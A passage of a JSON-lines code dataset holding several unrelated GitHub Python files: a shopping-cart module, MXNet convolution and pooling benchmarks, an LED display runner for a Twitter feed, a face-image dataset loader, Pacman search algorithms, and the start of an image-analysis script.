self.discount, self.tax_percent)\n return total\n \n def get_reward_points(self):\n points = int(self.calculate_order_total())\n if points >= 1000:\n points += 10\n return points\n\n\n# --------------------------------------------------------------------------------\n# Class: DynamicallyPricedItem\n# --------------------------------------------------------------------------------\n\nclass DynamicallyPricedItem:\n def __init__(self, id, quantity=1):\n self.id = id\n self.quantity = quantity\n\n def get_latest_price(self):\n endpoint = 'https://api.pandastore.com/getitem/' + str(self.id)\n response = requests.get(endpoint)\n price = response.json()['price']\n return price\n\n def calculate_item_total(self):\n total = self.quantity * self.get_latest_price()\n rounded = round(total, 2)\n return rounded\n", "repo_name": "AutomationPanda/shopping-cart-unit-tests", "sub_path": "shopping_cart/orders.py", "file_name": "orders.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "20835861447", "text": "import mxnet as mx\nfrom benchmark.opperf.utils.benchmark_utils import run_performance_test\nfrom benchmark.opperf.utils.common_utils import merge_map_list\nfrom benchmark.opperf.rules.default_params import MX_OP_MODULE\n\n\"\"\"Performance benchmark tests for MXNet NDArray Convolution and Pooling Operators.\n\nMXNet NDArray Pooling Operators\n\n1. MaxPool1D\n2. MaxPool2D\n3. SumPool1D\n4. SumPool2D\n4. AvgPool1D\n5. AvgPool2D\n6. GlobalMaxPool1D\n7. GlobalMaxPool2D\n8. GlobalAvgPool1D\n9. GlobalAvgPool2D\n10.GlobalSumPool1D\n11.GlobalSumPool2D\n12.ROIPooling\n\n(Under the hood uses mx.nd.pooling)\n\nMXNet NDArray NN Convolution Operators\n\n1. Conv1D\n2. Conv2D\n3. Conv1DTranspose (DeConvolution)\n4. Conv2DTranspose (DeConvolution)\n\n(Under the hood uses mx.nd.convolution, mx.nd.Deconvolution)\n\n\"\"\"\n\n\ndef run_pooling_operators_benchmarks(ctx=mx.cpu(), dtype='float32', profiler='native', int64_tensor='off', warmup=25, runs=100):\n \"\"\"Runs benchmarks with the given context, precision (dtype), and input data size (int64_tensor) for all the pooling\n operators in MXNet.\n\n Parameters\n ----------\n ctx: mx.ctx\n Context to run benchmarks\n dtype: str, default 'float32'\n Precision to use for benchmarks\n profiler: str, default 'native'\n Type of Profiler to use (native/python)\n int64_tensor: str, default 'off'\n Input tensor size to use for tests (if on, dimensions >= 2**32)\n warmup: int, default 25\n Number of times to run for warmup\n runs: int, default 100\n Number of runs to capture benchmark results\n\n Returns\n -------\n Dictionary of results. 
Key -> Name of the operator, Value -> Benchmark results.\n\n \"\"\"\n pool_types = ['avg', 'max', 'sum']\n global_pool_types = [0, 1]\n\n standard_data_list_pool1d = [(32, 3, 256), (32, 3, 64)]\n int64_tensor_data_list_pool1d = [(1, 1, 2**32)]\n standard_data_list_pool2d = [(32, 3, 256, 256), (32, 3, 64, 64)]\n int64_tensor_data_list_pool2d = [(2**28, 1, 4, 4)]\n standard_data_list_roipool = [(32, 3, 256, 256), (32, 3, 64, 64)]\n int64_tensor_data_list_roipool = [(32, 3, 2**13, 2**13)]\n\n if int64_tensor == 'on':\n data_list_pool1d = int64_tensor_data_list_pool1d\n data_list_pool2d = int64_tensor_data_list_pool2d\n data_list_roipool = int64_tensor_data_list_roipool\n else:\n data_list_pool1d = standard_data_list_pool1d\n data_list_pool2d = standard_data_list_pool2d\n data_list_roipool = standard_data_list_roipool\n\n # Run 1D and 2D Pooling performance runs\n pool1d_benchmark_res = []\n pool2d_benchmark_res = []\n for pool_type in pool_types:\n for global_pool in global_pool_types:\n for pool1d_data in data_list_pool1d:\n pool1d_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Pooling\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": pool1d_data,\n \"kernel\": 3,\n \"pool_type\": pool_type,\n \"global_pool\": global_pool,\n \"stride\": 1,\n \"pad\": 1}\n ],\n warmup=warmup,\n runs=runs)\n for pool2d_data in data_list_pool2d:\n pool2d_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Pooling\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": pool2d_data,\n \"kernel\": (3, 3),\n \"pool_type\": pool_type,\n \"global_pool\": global_pool,\n \"stride\": (1, 1),\n \"pad\": (0, 0)}\n ],\n warmup=warmup,\n runs=runs)\n # Run ROI Pooling performance runs\n roipool_benchmark_res = []\n for roipool_data in data_list_roipool:\n roipool_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"ROIPooling\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": roipool_data,\n \"rois\": (32, 5),\n \"pooled_size\": (2, 2),\n \"spatial_scale\": .5}\n ],\n warmup=warmup,\n runs=runs)\n # Prepare combined results\n mx_pooling_op_results = merge_map_list(pool1d_benchmark_res + pool2d_benchmark_res + roipool_benchmark_res)\n return mx_pooling_op_results\n\n\ndef run_convolution_operators_benchmarks(ctx=mx.cpu(), dtype='float32', profiler='native', int64_tensor='off', warmup=25, runs=100):\n \"\"\"Runs benchmarks with the given context, precision (dtype), and input data size (int64_tensor) for all the convolution\n operators in MXNet.\n\n Parameters\n ----------\n ctx: mx.ctx\n Context to run benchmarks\n dtype: str, default 'float32'\n Precision to use for benchmarks\n profiler: str, default 'native'\n Type of Profiler to use (native/python)\n int64_tensor: str, default 'off'\n Input tensor size to use for tests (if on, dimensions >= 2**32)\n warmup: int, default 25\n Number of times to run for warmup\n runs: int, default 100\n Number of runs to capture benchmark results\n\n Returns\n -------\n Dictionary of results. 
Key -> Name of the operator, Value -> Benchmark results.\n\n \"\"\"\n\n standard_data_list_conv1d = [(32, 3, 256), (32, 3, 64)]\n int64_tensor_data_list_conv1d = [(2**30, 1, 4)]\n standard_weight_conv1d = (1, 3, 3)\n int64_tensor_weight_conv1d = (1, 1, 1)\n standard_kernel_conv1d = (3,)\n int64_tensor_kernel_conv1d = (1,)\n standard_data_list_conv2d = [(32, 3, 256, 256), (32, 3, 64, 64)]\n int64_tensor_data_list_conv2d = [(2**28, 1, 4, 4)]\n standard_weight_conv2d = (1, 3, 3, 3)\n int64_tensor_weight_conv2d = (1, 1, 1, 1)\n standard_kernel_conv2d = (3, 3)\n int64_tensor_kernel_conv2d = (1, 1)\n\n if int64_tensor == 'on':\n data_list_conv1d = int64_tensor_data_list_conv1d\n weight_conv1d = int64_tensor_weight_conv1d\n kernel_conv1d = int64_tensor_kernel_conv1d\n data_list_conv2d = int64_tensor_data_list_conv2d\n weight_conv2d = int64_tensor_weight_conv2d\n kernel_conv2d = int64_tensor_kernel_conv2d\n else:\n data_list_conv1d = standard_data_list_conv1d\n weight_conv1d = standard_weight_conv1d\n kernel_conv1d = standard_kernel_conv1d\n data_list_conv2d = standard_data_list_conv2d\n weight_conv2d = standard_weight_conv2d\n kernel_conv2d = standard_kernel_conv2d\n\n conv1d_benchmark_res = []\n conv2d_benchmark_res = []\n # Conv1D Benchmarks\n for conv_data in data_list_conv1d:\n conv1d_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Convolution\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": conv_data,\n \"weight\": weight_conv1d,\n \"bias\": (1,),\n \"kernel\": kernel_conv1d,\n \"stride\": (1,),\n \"dilate\": (1,),\n \"pad\": (0,),\n \"num_filter\": 1,\n \"layout\": 'NCW'}],\n warmup=warmup,\n runs=runs)\n # Conv2D Benchmarks\n for conv_data in data_list_conv2d:\n conv2d_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Convolution\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": conv_data,\n \"weight\": weight_conv2d,\n \"bias\": (1,),\n \"kernel\": kernel_conv2d,\n \"stride\": (1, 1),\n \"dilate\": (1, 1),\n \"pad\": (0, 0),\n \"num_filter\": 1,\n \"layout\": 'NCHW'}],\n warmup=warmup,\n runs=runs)\n # Prepare combined results\n mx_conv_op_results = merge_map_list(conv1d_benchmark_res + conv2d_benchmark_res)\n return mx_conv_op_results\n\n\ndef run_transpose_convolution_operators_benchmarks(ctx=mx.cpu(), profiler='native', int64_tensor='off', dtype='float32', warmup=25, runs=100):\n \"\"\"Runs benchmarks with the given context, precision (dtype), and input data size (int64_tensor) for all the transpose convolution\n operators in MXNet.\n\n Parameters\n ----------\n ctx: mx.ctx\n Context to run benchmarks\n dtype: str, default 'float32'\n Precision to use for benchmarks\n profiler: str, default 'native'\n Type of Profiler to use (native/python)\n int64_tensor: str, default 'off'\n Input tensor size to use for tests (if on, dimensions >= 2**32)\n warmup: int, default 25\n Number of times to run for warmup\n runs: int, default 100\n Number of runs to capture benchmark results\n\n Returns\n -------\n Dictionary of results. 
Key -> Name of the operator, Value -> Benchmark results.\n\n \"\"\"\n\n standard_data_list_conv1d_transpose = [(32, 3, 256), (32, 3, 64)]\n int64_tensor_data_list_conv1d_transpose = [(2**30, 1, 4)]\n standard_weight_conv1d_transpose = (3, 1, 3)\n int64_tensor_weight_conv1d_transpose = (1, 1, 1)\n standard_kernel_conv1d_transpose = (3,)\n int64_tensor_kernel_conv1d_transpose = (1,)\n standard_data_list_conv2d_transpose = [(32, 3, 256, 256), (32, 3, 64, 64)]\n int64_tensor_data_list_conv2d_transpose = [(2**28, 1, 4, 4)]\n standard_weight_conv2d_transpose = (3, 1, 3, 3)\n int64_tensor_weight_conv2d_transpose = (1, 1, 1, 1)\n standard_kernel_conv2d_transpose = (3, 3)\n int64_tensor_kernel_conv2d_transpose = (1, 1)\n\n if int64_tensor == 'on':\n data_list_conv1d_transpose = int64_tensor_data_list_conv1d_transpose\n weight_conv1d_transpose = int64_tensor_weight_conv1d_transpose\n kernel_conv1d_transpose = int64_tensor_kernel_conv1d_transpose\n data_list_conv2d_transpose = int64_tensor_data_list_conv2d_transpose\n weight_conv2d_transpose = int64_tensor_weight_conv2d_transpose\n kernel_conv2d_transpose = int64_tensor_kernel_conv2d_transpose\n else:\n data_list_conv1d_transpose = standard_data_list_conv1d_transpose\n weight_conv1d_transpose = standard_weight_conv1d_transpose\n kernel_conv1d_transpose = standard_kernel_conv1d_transpose\n data_list_conv2d_transpose = standard_data_list_conv2d_transpose\n weight_conv2d_transpose = standard_weight_conv2d_transpose\n kernel_conv2d_transpose = standard_kernel_conv2d_transpose\n\n # Conv1DTranspose Benchmarks\n conv1d_transpose_benchmark_res = []\n for conv_data in data_list_conv1d_transpose:\n conv1d_transpose_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Deconvolution\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": conv_data,\n \"weight\": weight_conv1d_transpose,\n \"bias\": (1,),\n \"kernel\": kernel_conv1d_transpose,\n \"stride\": (1,),\n \"dilate\": (1,),\n \"pad\": (0,),\n \"num_filter\": 1,\n \"no_bias\": False,\n \"layout\": 'NCW'}],\n warmup=warmup,\n runs=runs)\n # Conv2DTranspose Benchmarks\n conv2d_transpose_benchmark_res = []\n for conv_data in data_list_conv2d_transpose:\n conv2d_transpose_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Deconvolution\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": conv_data,\n \"weight\": weight_conv2d_transpose,\n \"bias\": (1,),\n \"kernel\": kernel_conv2d_transpose,\n \"stride\": (1, 1),\n \"pad\": (0, 0),\n \"num_filter\": 1,\n \"no_bias\": False,\n \"layout\": 'NCHW'}],\n warmup=warmup,\n runs=runs)\n # Prepare combined results\n mx_transpose_conv_op_results = merge_map_list(conv1d_transpose_benchmark_res + conv2d_transpose_benchmark_res)\n return mx_transpose_conv_op_results\n", "repo_name": "apache/mxnet", "sub_path": "benchmark/opperf/nd_operations/nn_conv_operators.py", "file_name": "nn_conv_operators.py", "file_ext": "py", "file_size_in_byte": 17211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20642, "dataset": "github-code", "pt": "46", "api": [{"api_name": "mxnet.cpu", "line_number": 38, "usage_type": "call"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 87, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 87, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 102, "usage_type": 
"call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 102, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 119, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 119, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.common_utils.merge_map_list", "line_number": 132, "usage_type": "call"}, {"api_name": "mxnet.cpu", "line_number": 136, "usage_type": "call"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 193, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 193, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 211, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 211, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.common_utils.merge_map_list", "line_number": 228, "usage_type": "call"}, {"api_name": "mxnet.cpu", "line_number": 232, "usage_type": "call"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 288, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 288, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 308, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 308, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.common_utils.merge_map_list", "line_number": 325, "usage_type": "call"}]} +{"seq_id": "9432171229", "text": "#!/usr/bin/env python3\n\nfrom displaytools import *\nfrom sockettools import *\nimport time\nimport datetime\nimport subprocess\nimport signal\nimport sys\n\nMSG_PREFIX = '[run.py]: '\nchild_processes = []\nDISPLAY_IP = \"127.0.0.1\"\n\n###############################################################################\n# start of configuration section\n# only edit below this point\n###############################################################################\n\n# set the program you want to run\n# The options are:\n# - 'twitter' : listen to a twitter feed\n# - 'custom' : run the custom program that is bellow\nPROGRAM = 'twitter'\n\n##\n## Options for the twitter program\n##\n\n# Initial text to show on top row\nTWITTER_TWEET_TO_TEXT = 'Tweet naar:'\n\n# Topic to follow on twitter, without '#'\nTWITTER_TOPIC = 'boeschrik' \n\n###############################################################################\n# end of configuration section\n# do NOT change anything beyond this point, unless you know what you are doing\n###############################################################################\n\n###############################################################################\n# Definition of the custom program\n# You should only change this if you know what you are doing\n###############################################################################\ndef custom():\n social = PriorityReceiver()\n f = Font('ledFont')\n d = Display(DISPLAY_IP, echo = False)\n\n while True:\n time.sleep(1)\n\n###############################################################################\n# This is the twitter routine. 
You should NOT change this\n###############################################################################\ndef twitter():\n social = PriorityReceiver()\n f = Font('ledFont')\n d = Display(DISPLAY_IP, echo = False)\n \n timestamp = datetime.datetime.now().isoformat()\n twitter_output_file = open('log/twitter_'+timestamp, 'w')\n \n # run the twitter receiver\n twitter = subprocess.Popen(['/usr/bin/python3', 'twitterFollower.py', TWITTER_TOPIC],\n stderr = subprocess.STDOUT,\n stdout = twitter_output_file)\n child_processes.append(twitter)\n print(MSG_PREFIX + 'Twitter follower started')\n \n \n \n # Set initial text on the display\n StaticRow(d, f, TWITTER_TWEET_TO_TEXT).load(0)\n StaticRow(d, f, '#' + TWITTER_TOPIC).show(1)\n print(MSG_PREFIX + 'Initial text placed on display')\n \n message = None\n priority = None\n \n print(MSG_PREFIX + 'Entering main loop')\n \n while True:\n social.update()\n \n # receive a new message if one is available\n if social.new_messages():\n message, priority = social.pop()\n print(MSG_PREFIX + 'Priority {}:\\t {}'.format(priority, message))\n \n else:\n time.sleep(1)\n \n if message != None:\n ScrollText(d, f, message, sleeptime = 0.025).show()\n\n\n###############################################################################\n# This is the twitter routine. You should NOT change this\n###############################################################################\ndef signal_handler(signum, frame):\n print(MSG_PREFIX + 'Received following signal: ', signum)\n\n if signum == signal.SIGTERM:\n print(MSG_PREFIX + 'Shutting down, goodnight!')\n for child in child_processes:\n try:\n child.terminate()\n except ProcessLookupError:\n pass\n sys.exit()\n\nif __name__ == '__main__':\n\t\n signal.signal(signal.SIGTERM, signal_handler)\n\n print(MSG_PREFIX + 'Goodmorning') \n if PROGRAM == 'twitter':\n twitter() \n elif PROGRAM == 'custom':\n custom()\n", "repo_name": "pietdevaere/muchosledjes", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3780, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.sleep", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 65, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 92, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 104, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 111, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 115, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 115, "usage_type": "attribute"}]} +{"seq_id": "4076209155", "text": "from torch.utils import data\nfrom PIL import Image\nimport random\nimport os\nimport os.path\nimport sys\n\nimport cv2\nimport numpy as np\n\ndef random_compress(img):\n rand_num = random.randint(40, 90)\n img_encode = cv2.imencode('.jpg', img, [int(cv2.IMWRITE_JPEG_QUALITY),rand_num])\n data_encode = np.array(img_encode[1])\n str_encode = data_encode.tostring()\n nparr = np.fromstring(str_encode, np.uint8)\n img_decode = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n return img_decode\n\ndef pil_loader(path):\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert('RGB')\n\n\ndef 
cv2_loader(path):\n img1 = cv2.imread(path)\n if np.random.random() < 0.5:\n size = np.random.choice([60, 80, 100])\n img1 = cv2.resize(img1, (size, size))\n img2 = cv2.cvtColor(img1,cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img2)\n return img\n\nclass ImageFolder(data.Dataset):\n def __init__(self, trainList, transform=None, loader=None):\n super(ImageFolder, self).__init__()\n self.transform = transform\n if loader is None:\n self.loader = cv2_loader\n else:\n self.loader = loader\n with open(trainList) as f:\n self.samples = f.readlines()\n self.classes = int(self.samples[-1].split(';')[1]) + 1\n\n def __getitem__(self, index):\n path, target = self.samples[index].split(';')\n target = int(target)\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n\n return sample, target\n\n def __len__(self):\n return len(self.samples)\n\n", "repo_name": "deepcam-cn/FaceQuality", "sub_path": "dataset/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 1631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 168, "dataset": "github-code", "pt": "41", "api": [{"api_name": "random.randint", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 32, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "32487685183", "text": "from __future__ import annotations\n\"\"\"\nThomas Caron - 1944066\nSlimane Boussafeur - 2017001\n\"\"\"\n\n# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick 
Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\n\nimport util\nfrom typing import Any, List, Literal, Optional\nfrom dataclasses import dataclass\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"util.raiseNotDefined()\n Returns the start state for the search problem.\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state.\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples, (successor,\n action, stepCost), where 'successor' is a successor to the current\n state, 'action' is the action required to get there, and 'stepCost' is\n the incremental cost of expanding to that successor.\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions.\n The sequence must be composed of legal moves.\n \"\"\"\n util.raiseNotDefined()\n\nDirection = Literal['NORTH', 'SOUTH', 'EAST', 'WEST', 'STOP'] # Type aliases\n\n@dataclass(eq=False)\nclass Node:\n state: Any\n previous: Optional[Node] = None\n direction: Optional[Direction] = None\n\n @property\n def path(self: Node) -> List[Direction]:\n \"\"\"\n Returns the direction taken to arrive at this node\n \"\"\"\n if self.previous is None:\n return []\n return self.previous.path + [self.direction]\n\n def __eq__(self, __o: Node) -> bool:\n return self.state == __o.state\n\n def __hash__(self) -> int:\n return hash(self.state)\n\n@dataclass(eq=False)\nclass CostNode(Node):\n \"\"\"\n Node used for A* and UCS\n This node is the same as the one previously declared except we add a cost field\n \"\"\"\n previous: Optional[CostNode] = None # overwrite\n cost: int = 0 # Cost from the start\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other maze, the\n sequence of moves will be incorrect, so only use this for tinyMaze.\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. 
Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n \"\"\"\n visited = set()\n stack = util.Stack()\n stack.push(Node(problem.getStartState()))\n\n while not stack.isEmpty():\n node: Node = stack.pop()\n if problem.isGoalState(node.state):\n return node.path\n if node in visited:\n continue\n visited.add(node)\n for state, direction, _, in problem.getSuccessors(node.state):\n stack.push(Node(state, node, direction))\n\n return []\n\n\ndef breadthFirstSearch(problem):\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n\n visited = set()\n queue = util.Queue()\n queue.push(Node(problem.getStartState()))\n\n while not queue.isEmpty():\n node = queue.pop()\n if problem.isGoalState(node.state):\n return node.path\n if node in visited:\n continue\n visited.add(node)\n for state, direction, _, in problem.getSuccessors(node.state):\n queue.push(Node(state, node, direction))\n\n return []\n \ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first.\"\"\"\n \n visited = set()\n queue = util.PriorityQueue()\n queue.push(CostNode(problem.getStartState()), 0)\n\n while not queue.isEmpty():\n node = queue.pop()\n if problem.isGoalState(node.state):\n return node.path\n if node in visited:\n continue\n visited.add(node)\n for state, direction, cost in problem.getSuccessors(node.state):\n next_node = CostNode(state, node, direction, node.cost + cost)\n queue.push(next_node, next_node.cost)\n\n return []\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n visited = set()\n queue = util.PriorityQueue()\n queue.push(CostNode(problem.getStartState()), heuristic(problem.getStartState(), problem))\n\n while not queue.isEmpty():\n node = queue.pop()\n if problem.isGoalState(node.state):\n return node.path\n if node in visited:\n continue\n visited.add(node)\n for state, direction, cost in problem.getSuccessors(node.state):\n next_node = CostNode(state, node, direction, node.cost + cost)\n queue.push(next_node, next_node.cost + heuristic(state, problem))\n \n return []\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n", "repo_name": "tomtom103/INF8215", "sub_path": "devoir1/search.py", "file_name": "search.py", "file_ext": "py", "file_size_in_byte": 6491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "util.raiseNotDefined", "line_number": 42, "usage_type": "call"}, {"api_name": "util.raiseNotDefined", "line_number": 50, "usage_type": "call"}, {"api_name": "util.raiseNotDefined", "line_number": 61, "usage_type": "call"}, {"api_name": "util.raiseNotDefined", "line_number": 70, "usage_type": "call"}, {"api_name": "typing.Literal", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 81, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", 
"line_number": 74, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 101, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 95, "usage_type": "call"}, {"api_name": "game.Directions.SOUTH", "line_number": 111, "usage_type": "attribute"}, {"api_name": "game.Directions", "line_number": 111, "usage_type": "name"}, {"api_name": "game.Directions.WEST", "line_number": 112, "usage_type": "attribute"}, {"api_name": "game.Directions", "line_number": 112, "usage_type": "name"}, {"api_name": "util.Stack", "line_number": 127, "usage_type": "call"}, {"api_name": "util.Queue", "line_number": 147, "usage_type": "call"}, {"api_name": "util.PriorityQueue", "line_number": 166, "usage_type": "call"}, {"api_name": "util.PriorityQueue", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "73499579643", "text": "\"\"\"\nExtract pouch volume\n\"\"\"\n\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nfrom skimage.measure import regionprops\nfrom skimage.segmentation import active_contour\nimport numpy as np\n\n# import nucleo_segment classes\nfrom storage.image import ImageHandler\nfrom processing.image import ImageProcessing\nfrom frontend.figures.plot import Plot\n\n# define directories\nwork_dir = '/Users/schiend/Desktop/Drive/Experiments/Carles/'\n\n# define files\npouch_files = [\n 'Q4_late/vgQE-dsRed_mLamin-A488_wL3-L2 late sync_25C.lif - Series066.tif',\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series012.tif' # trachea in the way\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series015.tif' # tilted\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series020.tif' # ok\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series022.tif' # best\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series027.tif' # too weak\n]\n\npouch_thrs = [\n 40,\n #?,\n #?,\n 100\n #100\n]\n\npouch_imgs = list()\npouch_stacks = list()\n\nfor file in pouch_files:\n print('--- LOAD %s' % file)\n\n # load image - Z, C, Y, X\n pouch_imgs.append(io.imread(\n work_dir + file\n ))\n\n if len(pouch_imgs[-1].shape) > 3:\n # reorder axes - C, Z, Y, X\n if pouch_imgs[-1].shape[1] < 10:\n pouch_stacks.append(pouch_imgs[-1].swapaxes(0, 1)[0, 40:41:1, :, :, 0])\n else:\n pouch_stacks.append(pouch_imgs[-1][:, :, :, 0])\n else:\n pouch_stacks.append(pouch_imgs[-1][20:61:10])\n\nprocessing_steps = [\n ['EQU'],\n ['THR', 